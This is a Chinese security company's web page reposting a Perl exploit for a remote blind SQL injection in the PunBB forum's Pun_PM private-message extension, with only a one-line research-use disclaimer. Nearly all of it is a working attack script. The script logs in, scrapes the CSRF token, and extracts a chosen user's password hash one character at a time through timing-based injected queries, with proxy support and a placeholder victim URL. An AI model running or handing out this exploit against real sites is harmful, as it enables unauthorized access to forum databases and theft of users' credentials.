网络安全 红科网安(北京)科技有限公司 联系我们 | 加入收藏
信息安全紧急求助:400-6662-110
    红科网安 / 技术研究 融汇优秀技术 创新攻防理念 打造安全专家! Honkwin (Beijing) Science and Technology Co.Ltd
  技术研究
 
 
      业界动态
      安全漏洞
      技术文章
 

    客服热线:
    010-62663110
    010-62717538
PunBB <= 1.3.4 and Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit
2010-07-28 15:52:13 作者: honkwin 来源: 浏览次数:0
 
上一篇 下一篇
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
#!/usr/bin/perl
# [0-Day] PunBB <= 1.3.* Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit
# Author/s: Dante90, WaRWolFz Crew
# Created: 2009.07.30 after 0 days the bug was discovered.
# Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, Shades Master, The:Paradox, V1R5, yeat
# Greetings To: _ nEmO _, XaDoS, Necrofiend, Lutor, vagabondo, hacku, yawn, The_Exploited, Shotokan-The Hacker, _mRkZ_,
#               Chuzz, init, plucky, SaRtE, Lupo
# Thanks For Testing: BlAcK HaT, l3d
# Web Site: www.warwolfz.org
# My Wagend (Dante90): dante90wwz.altervista.org
# Unit-X Project: www.unitx.net
# ----
# Why I've decided to publish this?
# Because in "Package: Pun_PM <= v1.2.9" the bug was fixed.
# ----
# DETAILS
# ./PunBB v1.3.*/extensions/pun_pm/functions.php
# LINES: 504 -> 526
#   function pun_pm_edit_message()
#   {
#       global $forum_db, $forum_user, $lang_pun_pm;
#
#       $errors = array();
#
#       // Verify input data
#       $query = array(
#           'SELECT'    => 'm.id as id, m.sender_id as sender_id, m.status as status, u.username as username, m.subject as subject, m.body as body',
#           'FROM'      => 'pun_pm_messages m',
#           'JOINS'     => array(
#               array(
#                   'LEFT JOIN'     => 'users AS u',
#                   'ON'            => '(u.id = m.receiver_id)'
#               ),
#           ),
#           'WHERE'     => 'm.id = '.$forum_db->escape($_GET['message_id']).' AND m.sender_id = '.$forum_user['id'].' AND m.deleted_by_sender = 0'
#       );
#
#       ($hook = get_hook('pun_pm_fn_edit_message_pre_validate_query')) ? eval($hook) : null;
#
#       $result = $forum_db->query_build($query) or error(__FILE__, __LINE__);
# ----
# GET http://127.0.0.1/WaRWolFz/misc.php?section=pun_pm&pmpage=write&message_id=-1'
# Error - PunBB
# An error was encountered
# The error occurred on line 525 in ./WaRWolFz/extensions/pun_pm/functions.php
# Database reported: Errore di sintassi nella query SQL vicino a '\ AND m.sender_id = 2 AND m.deleted_by_sender = 0' linea 1 (Errno: 1064).
 
use strict;
use warnings;
 
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use Time::HiRes;
use IO::Socket;
 
my ($UserName,$PassWord,$ID) = @ARGV;
if (@ARGV < 3) {
    &usage();
    exit();
}
 
my $Message = "";
my $Hash = "";
my ($Time,$Time_Start,$Time_End,$Response);
my ($Start,$End);
my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
my $Method = HTTP::Request->new(GET => $Host);
my $Cookies = new HTTP::Cookies;
my $HTTP = new LWP::UserAgent(
            agent => 'Mozilla/5.0',
            max_redirect => 0,
            cookie_jar => $Cookies,
        ) or die $!;
my $Referrer = "http://www.warwolfz.org/";
my $DefaultTime = request($Referrer);
 
sub request {
    $Referrer = $_[0];
    $Method->referrer($Referrer);
    $Start = Time::HiRes::time();
    $Response = $HTTP->request($Method);
    $Response->is_success() or die "$Host : ", $Response->message," ";
    $End = Time::HiRes::time();
    $Time = $End - $Start;
    return $Time;
}
 
sub Blind_SQL_Jnjection {
    my ($dec,$hex) = @_;
    return "./misc.php?section=pun_pm&pmpage=write&message_id=-1 OR 1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `users` WHERE `id`=${ID})--";
}
 
sub Clear() {
    my $launch = $^O eq 'MSWin32' ? 'cls' : 'clear';
    return system($launch);
}
 
sub Login() {
    if ($ARGV[4] =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}?$/) {
        $Cookies->proxy(['http', 'ftp'], 'http://'.$ARGV[4]) or die $!;
    }
    my $Get = $HTTP->get($Host.'login.php');
    my $csrf_token = "";
    if ($Get->content =~ /type="hidden" name="csrf_token" value="([a-f0-9]{1,40})/i) { #ByPassing csrf_token hidden input
        $csrf_token = $1;
    }
    my $Login = $HTTP->post($Host.'login.php',
                [
                    form_sent       => '1',
                    redirect_url    => $Host.'login.php',
                    csrf_token      => $csrf_token,
                    req_username    => $UserName,
                    req_password    => $PassWord,
                    save_pass       => '1',
                    login => 'Login',
                ]) || die $!;
 
    if ($Login->content =~ /Verrai trasferito automaticamente ad una nuova pagina in 1 secondo/i) { #English Language: You should automatically be forwarded to a new page in 1 second.
        return 1;
    } else {
        return 0;
    }
}
 
sub usage {
    Clear();
    {
        print " [0-Day] PunBB <= 1.3.4 Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit ";
        print " ------------------------------------------------------ ";
        print " * USAGE:                                             * ";
        print " * cd [Local Disk]:\\[Directory Of Exploit]\\           * ";
        print " * perl name_exploit.pl [username] [password] [id]    * ";
        print " * [proxy] is optional (ex: 151.57.4.97:8080)         * ";
        print " ------------------------------------------------------ ";
        print " *         Powered By Dante90, WaRWolFz Crew          * ";
        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org * ";
        print " ------------------------------------------------------ ";
    };
    exit;
}
 
sub refresh {
    Clear();
    {
        print " [0-Day] PunBB <= 1.3.4 Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit ";
        print " ------------------------------------------------------ ";
        print " * USAGE:                                             * ";
        print " * cd [Local Disk]:\\[Directory Of Exploit]\\           * ";
        print " * perl name_exploit.pl [username] [password] [id]    * ";
        print " * [proxy] is optional (ex: 151.57.4.97:8080)         * ";
        print " ------------------------------------------------------ ";
        print " *         Powered By Dante90, WaRWolFz Crew          * ";
        print " * www.warwolfz.org - dante90_founder[at]warwolfz.org * ";
        print " ------------------------------------------------------ ";
    };
    print $_[0] ." ";
    print " * Victime Site: " . $_[1] . " ";
    print " * Default Time: " . $_[2] . " seconds ";
    print " * BruteForcing Hash: " . chr($chars[$_[3]]) . " ";
    print " * BruteForcing N Char Hash: " . $_[6] . " ";
    print " * SQL Time: " . $_[5] . " seconds ";
    print " * Hash: " . $_[4] . " ";
}
 
sub Main(){
    if (Login() == 1) {
        $Message = " * Logged in as: ".$UserName;
    } elsif (Login() == 0) {
        $Message = " * Login Failed.";
        refresh($Message, $Host, $DefaultTime, "0", $Hash, $Time, "1");
        print " * Exploit Failed                                     * ";
        print " ------------------------------------------------------ ";
        exit;
    }
    for (my $I=1; $I<=40; $I++) { #N Hash characters
        for (my $J=0; $J<=15; $J++) { #0 -> F
            $Time_Start = time();
            my $Get1 = $HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J]));
            $Time_End = time();
            $Time = request($Referrer);
            refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
            if ($Time_End - $Time_Start > 6) {
                $Time = request($Referrer);
                refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
                if ($Time_End - $Time_Start > 6) {
                    syswrite(STDOUT,chr($chars[$J]));
                    $Hash .= chr($chars[$J]);
                    $Time = request($Referrer);
                    refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
                    last;
                }
            }
        }
        if ($I == 1 && length $Hash < 1 && !$Hash) {
            print " * Exploit Failed                                     * ";
            print " ------------------------------------------------------ ";
            exit;
        }
        if ($I == 40) {
            print " * Exploit Successfully Executed                      * ";
            print " ------------------------------------------------------ ";
            system("pause");
        }
    }
}
 
Main();
网络安全   公司简介  | 联系我们  | 加入我们 | 隐私声明 | 版权申明 | 免责条款 | 网站地图 | 合作伙伴 | 合作加盟 | 帮助 | 友情链接 |
Copyright @ 2007-2011 Honkwin. All Rights Reserved.      献身使命,让网络因我们而安全!
京ICP备:09027577号   单位编号:1101083313